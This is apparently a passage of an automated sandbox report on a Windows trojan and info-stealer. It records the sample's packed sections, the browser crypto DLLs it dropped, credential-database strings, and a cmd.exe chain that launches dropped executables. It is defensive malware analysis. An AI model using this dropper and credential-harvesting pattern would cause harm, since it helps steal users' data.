                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA134A00_2_6CA134A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA1C4A00_2_6CA1C4A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C6C800_2_6C9C6C80
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DD4D00_2_6C9DD4D0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C64C00_2_6C9C64C0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F6CF00_2_6C9F6CF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BD4E00_2_6C9BD4E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2542B0_2_6CA2542B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F5C100_2_6C9F5C10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2AC000_2_6CA2AC00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA02C100_2_6CA02C10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C54400_2_6C9C5440
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2545C0_2_6CA2545C
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F0DD00_2_6C9F0DD0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA185F00_2_6CA185F0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E05120_2_6C9E0512
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DED100_2_6C9DED10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CFD000_2_6C9CFD00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA14EA00_2_6CA14EA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D5E900_2_6C9D5E90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA1E6800_2_6CA1E680
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA276E30_2_6CA276E3
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BBEF00_2_6C9BBEF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CFEF00_2_6C9CFEF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F7E100_2_6C9F7E10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA19E300_2_6CA19E30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA056000_2_6CA05600
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA26E630_2_6CA26E63
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D9E500_2_6C9D9E50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F3E500_2_6C9F3E50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D46400_2_6C9D4640
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BC6700_2_6C9BC670
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA02E4E0_2_6CA02E4E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA077A00_2_6CA077A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E6FF00_2_6C9E6FF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BDFE00_2_6C9BDFE0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F77100_2_6C9F7710
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C9F000_2_6C9C9F00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E60A00_2_6C9E60A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA250C70_2_6CA250C7
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DC0E00_2_6C9DC0E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F58E00_2_6C9F58E0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA048200_2_6CA04820
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9C78100_2_6C9C7810
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9FB8200_2_6C9FB820
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D88500_2_6C9D8850
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DD8500_2_6C9DD850
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9FF0700_2_6C9FF070
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F51900_2_6C9F5190
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9ED9B00_2_6C9ED9B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA129900_2_6CA12990
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BC9A00_2_6C9BC9A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA0B9700_2_6CA0B970
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2B1700_2_6CA2B170
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9DA9400_2_6C9DA940
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CD9600_2_6C9CD960
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA22AB00_2_6CA22AB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CCAB00_2_6C9CCAB0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA2BA900_2_6CA2BA90
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B22A00_2_6C9B22A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9E4AA00_2_6C9E4AA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F8AC00_2_6C9F8AC0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9D1AF00_2_6C9D1AF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9FE2F00_2_6C9FE2F0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9F9A600_2_6C9F9A60
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9BF3800_2_6C9BF380
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA253C80_2_6CA253C8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9FD3200_2_6C9FD320
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9B53400_2_6C9B5340
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C9CC3700_2_6C9CC370
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DAE41010_2_00DAE410
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DA4CD010_2_00DA4CD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DE304810_2_00DE3048
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DD7D6310_2_00DD7D63
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DA4AD010_2_00DA4AD0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DE6EE910_2_00DE6EE9
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DE763B10_2_00DE763B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DE2BB010_2_00DE2BB0
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DE775B10_2_00DE775B
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 10_2_00DE870010_2_00DE8700
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F60000012_2_7F600000
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeCode function: 12_2_7F60068012_2_7F600680
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C9ECBE8 appears 134 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C9F94D0 appears 90 times
                        Source: file.exe, 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                        Source: file.exe, 00000000.00000002.2271135677.0000000000A42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe. vs file.exe
                        Source: file.exe, 00000000.00000002.2311195968.000000006CC35000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9996665396341463
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9951171875
                        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9898681640625
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: Section: ZLIB complexity 0.9978387551229508
                        Source: HCGCBFHCFC.exe.0.drStatic PE information: Section: wiqvgckm ZLIB complexity 0.9943164933135216
                        Source: amadka[1].exe.0.drStatic PE information: Section: ZLIB complexity 0.9978387551229508
                        Source: amadka[1].exe.0.drStatic PE information: Section: wiqvgckm ZLIB complexity 0.9943164933135216
                        Source: explorti.exe.8.drStatic PE information: Section: ZLIB complexity 0.9978387551229508
                        Source: explorti.exe.8.drStatic PE information: Section: wiqvgckm ZLIB complexity 0.9943164933135216
                        Source: random[1].exe.10.drStatic PE information: Section: ZLIB complexity 0.9996665396341463
                        Source: random[1].exe.10.drStatic PE information: Section: ZLIB complexity 0.9951171875
                        Source: random[1].exe.10.drStatic PE information: Section: ZLIB complexity 0.9898681640625
                        Source: a62ee169b8.exe.10.drStatic PE information: Section: ZLIB complexity 0.9996665396341463
                        Source: a62ee169b8.exe.10.drStatic PE information: Section: ZLIB complexity 0.9951171875
                        Source: a62ee169b8.exe.10.drStatic PE information: Section: ZLIB complexity 0.9898681640625
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/30@0/3
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6CA17030
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: file.exe, 00000000.00000003.2141474004.0000000022934000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159298010.0000000022928000.00000004.00000020.00020000.00000000.sdmp, CFHCGHJDBFIIDGDHIJDB.0.dr, JEHJKJEBGHJJKEBGIECA.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: file.exe, 00000000.00000002.2293873912.000000001C9BE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2309760813.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: file.exeReversingLabs: Detection: 55%
                        Source: file.exeVirustotal: Detection: 48%
                        Source: HCGCBFHCFC.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explorti.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHCAEGCBFH.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe "C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess created: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe "C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
